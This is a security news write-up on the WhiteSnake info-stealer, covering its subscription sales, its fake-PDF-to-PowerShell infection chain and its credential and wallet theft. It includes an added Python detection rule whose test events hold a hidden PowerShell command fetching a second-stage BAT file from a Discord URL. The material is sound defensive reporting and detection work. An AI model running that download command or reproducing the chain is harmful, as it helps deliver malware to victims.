
WhiteSnake Promotes Windows and Linux Variants with a MaaS Model

A new info-stealer dubbed WhiteSnake has been observed targeting both Windows and Linux users. The malware, offered via a MaaS subscription, is designed to gather a range of sensitive information, including credit card numbers, passwords, and screenshots from the victim's system. Because it is still in its development phase, its operators are updating the malware binary on a daily basis.

The MaaS model

Cyble researchers found an advertisement on a cybercrime forum promoting WhiteSnake and claiming identical functionality for its Windows and Linux variants.
  • According to the forum post, the Linux variant claims to target Exodus and Electrum wallets, Firefox browser, FileZilla, Thunderbird, Pidgin, and Telegram.
  • The Windows variant, the older and more mature of the two, is capable of stealing sensitive data from browsers such as Mozilla Firefox, Google Chrome, Brave-Browser, Chromium, and Microsoft Edge.
  • The malware was priced at $120 per month, $300 for three months, $500 for 6 months, $900 per year, and $1,500 for lifetime access.

Malware distribution chain

Experts analyzed samples for the Windows variant only, as Linux samples were not available.
  • The initial infection starts with a spam email containing an executable file disguised as a PDF document. 
  • When the victim opens the supposed PDF, the executable runs, drops a BAT file, and executes it.
  • The BAT file executes a PowerShell script that proceeds to download another BAT file from a Discord URL.
  • The script decodes the content of the downloaded BAT file and saves it as a binary executable, build[.]exe. This final payload is the WhiteSnake info-stealer.
  • Upon execution, it creates a mutex to avoid double execution on the same machine and performs anti-VM checks to evade detection. It then starts the data theft process.
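The distribution chain above (document-lookalike executable, then cmd running a BAT, then PowerShell fetching a second stage from a Discord URL) lends itself to a parent-child process correlation rule. The following is an added example, not code from Cyble or from the article; the Sysmon-style events, file names and URL are constructed, and the tuple layout (pid, parent pid, image path, command line) is an assumption.

```python
import re

# Constructed Sysmon-style process-creation events; not taken from the article.
# Tuple layout (assumed): (pid, parent pid, image path, command line)
EVENTS = [
    (100, 1,   r"C:\Windows\explorer.exe", "explorer.exe"),
    (201, 100, r"C:\Users\alice\Downloads\Invoice.pdf.exe", "Invoice.pdf.exe"),
    (202, 201, r"C:\Windows\System32\cmd.exe",
     r"cmd.exe /c C:\Users\alice\AppData\Local\Temp\run.bat"),
    (203, 202, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -w hidden -c \"iwr https://cdn.discordapp.com/attachments/1/2/stage2.bat -OutFile stage2.bat\""),
    # Benign control: a real PDF reader opening a document; must not alert.
    (300, 100, r"C:\Program Files\Adobe\Acrobat.exe", "Acrobat.exe report.pdf"),
]

# Executable with a document extension in front of it (the "PDF" lure).
DOUBLE_EXT = re.compile(r"\.(pdf|doc|docx|xls|xlsx|txt)\.(exe|scr|com)$", re.I)
# cmd.exe invoked with a .bat file somewhere on its command line.
BAT_VIA_CMD = re.compile(r"cmd(\.exe)?\s.*\.bat\b", re.I)
# PowerShell whose command line carries a Discord-hosted URL.
PS_DISCORD = re.compile(r"powershell.*https?://[^\s\"']*discord[^\s\"']*", re.I)

def ancestry(events, pid, depth=5):
    """Yield the event for pid, then its parent, grandparent, ... up to depth."""
    by_pid = {e[0]: e for e in events}
    while pid in by_pid and depth > 0:
        ev = by_pid[pid]
        yield ev
        pid, depth = ev[1], depth - 1

def detect(events):
    """Alert on a PowerShell Discord download whose ancestors include a cmd-run
    BAT file and a document-lookalike executable, i.e. the full chain."""
    alerts = []
    for ev in events:
        if not PS_DISCORD.search(ev[3]):
            continue
        chain = list(ancestry(events, ev[0]))
        has_bat = any(BAT_VIA_CMD.search(e[3]) for e in chain[1:])
        lure = [e for e in chain[1:] if DOUBLE_EXT.search(e[2])]
        if has_bat and lure:
            alerts.append({"pid": ev[0], "lure": lure[0][2],
                           "chain": [e[2].rsplit("\\", 1)[-1] for e in reversed(chain)]})
    return alerts
```

Requiring all three stages in one process lineage keeps a lone PowerShell download from Discord, or a lone double-extension file, from firing on its own.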

Malware capabilities

  • WhiteSnake info-stealer can steal files from various cryptocurrency wallets such as Atomic, Bitcoin, Coinomi, Electrum, Exodus, and Guarda. 
  • The malware can access cryptocurrency wallets through specific directories and retrieve data from crypto wallet browser extensions.
  • It collects sensitive session data from various messaging applications such as Discord, Pidgin, Steam, and Telegram, mail clients such as Thunderbird, FTP clients such as FileZilla, and various other applications including Snowflake.

Wrapping up

Although the WhiteSnake info-stealer is still in its development phase, its operators have expanded its potential victim base by developing both Windows and Linux variants. With such adaptability, it can emerge as a prominent threat in the near future, researchers surmise.
Cyware Publisher